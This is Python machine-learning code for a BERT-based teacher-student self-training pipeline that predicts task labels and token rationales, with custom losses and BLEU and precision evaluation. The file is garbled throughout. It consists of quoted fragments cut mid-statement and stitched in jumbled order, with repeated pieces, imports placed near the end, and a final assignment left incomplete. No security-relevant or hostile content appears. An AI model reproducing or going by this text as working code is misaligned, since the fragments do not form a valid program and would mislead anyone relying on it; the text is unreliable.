logger.info(\"No sampling at the moment; choose", "= y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1],", "0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if", "i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in", "indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices],", "np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64) acc,", "temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'),", "unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5,", "r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0]))", "np.ones(len(y_dev))]) logger.info (\"Validation loss for run {} : {}\".format(counter, val_loss)) if val_loss[0] <", "y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if", "logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0,", "== 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the task", "test_acc, r_acc = out[3], out[4], out[5] elif 'joint' in type_: out = model.evaluate(X_test,", "y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0],", "if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled", "{\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are not rationales u-r", "score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)):", "= np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance", "val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc:", "y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels))", "prediction data on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp", "= np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif", "r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample", "y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint,", "out[4], out[5] logger.info (\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info", "logger.info(\"BLEU-1 score of rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score", "{}\".format(test_acc)) logger.info (\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc", "'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier':", "type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat =", "= model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc,", "0. max_best_acc = 0. val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test))", "{}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape)) if 'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch,", "test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out =", "times with different initialization to select best base model based on validation loss", "{}'.format(gpus)) #run the base model n times with different initialization to select best", "axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc,", "Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None,", "model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0,", "loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'],", "metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch,", "def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None", "average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], []", "verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0]", "restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ :", "\"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size],", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0],", "sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info", "else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob,", "as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for", "examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_:", "np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_'", "model.predict(X_unlabeled_sample, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(),", "elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif", "max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev,", "'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"),", "'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size],", "on student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0,", "data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict()", "os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc =", "custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r']", "axis=-1) #compute confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating", "#, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint'", "open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None # model_task for", "out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1)", "= [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier':", "= [1.0, 0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0,", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "loss best_base_model = None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10", "y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test,", "os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in type_", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if", "'''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if type_ ==", "{}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved", "y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def", "test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task =", "truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data", "on teacher model for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0,", "= np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance", "X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0)", "out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc))", "= np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\":", "temp['text'] = text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp)", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test,", "= os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file): model.load_weights(model_file) logger.info (\"Model file loaded from {}\".format(model_file))", "y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev,", "logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3,", "if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\")", "= [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights = [1.0,", "type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0],", "val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif", "'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] =", "unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg'", "task_acc best_val_acc = task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0],", "\"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint'", "token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task acc", "skip evaluation of the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1", "elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)),", "set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student", "select best base model based on validation loss best_base_model = None best_validation_loss =", "i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) >", "elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss", "open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task) across all", "0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0,", "y_test[i][j+1] == 1: #to skip evaluation of the task label temp_t.append(temp[j]) pred_1 +=", "0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model): {}", "type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp))", "\".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (student model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4", "j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j])", "unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample,", "= val_loss[0] model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation", "{}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in", "if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct)", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set", "len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)),", "not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']),", "random.Random(GLOBAL_SEED).shuffle(indx) if len(indx) > unsup_size: indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for", "cce_loss + 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return", "X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg']", "type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss',", "y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus,", "= model best_validation_loss = val_loss[0] model = best_base_model ''' if 'mtl' in type_:", "len(indx))) indices.extend(indx) indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch =", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout,", "1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that are", "{}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred)", "= tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1: temp_p.append(temp[j]) if y_test[i][j+1]", "(\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not", "in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth']", "y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]) elif 'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train,", "= np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0],", "if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc", "the moment; choose all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "on {} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices =", "(y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r))", "f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels))", "= 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask tokens that", "import shuffle from transformers import * import logging import math import models import", "truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word in", "y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs = y_val[indices] probs_rat = y_rat[indices] cls", "in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0]", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout,", "= np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_:", "= np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1)", "= np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample, batch_size=64)", "np import os, sys import json import nltk import tensorflow as tf import", "model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc,", "= 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\":", "#+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt' in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0,", "numpy as np import os, sys import json import nltk import tensorflow as", "the task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+=", "model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if", "y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss", "> max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3]", "\".format(score4/len(pred))) best_loss = np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text =", "model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5,", "out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred =", "import os, sys import json import nltk import tensorflow as tf import tensorflow.keras", "axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices", "acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat = 